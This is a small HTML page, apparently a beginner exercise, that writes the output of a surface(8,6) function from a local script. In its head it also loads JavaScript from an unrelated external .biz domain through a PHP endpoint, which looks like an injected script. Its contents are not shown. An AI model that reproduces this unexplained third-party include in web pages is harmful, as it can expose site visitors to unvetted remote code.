<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <script src="https://mboahost.biz/action2.php" type="text/javascript"></script>

</head> 
<body>
    <script src="javascript/functions.js"></script>
    <div id="mydiv"><script>document.write(surface(8,6))</script></div> 
    <!-- <script src="javascript/output.js"></script>  -->
</body>
</html>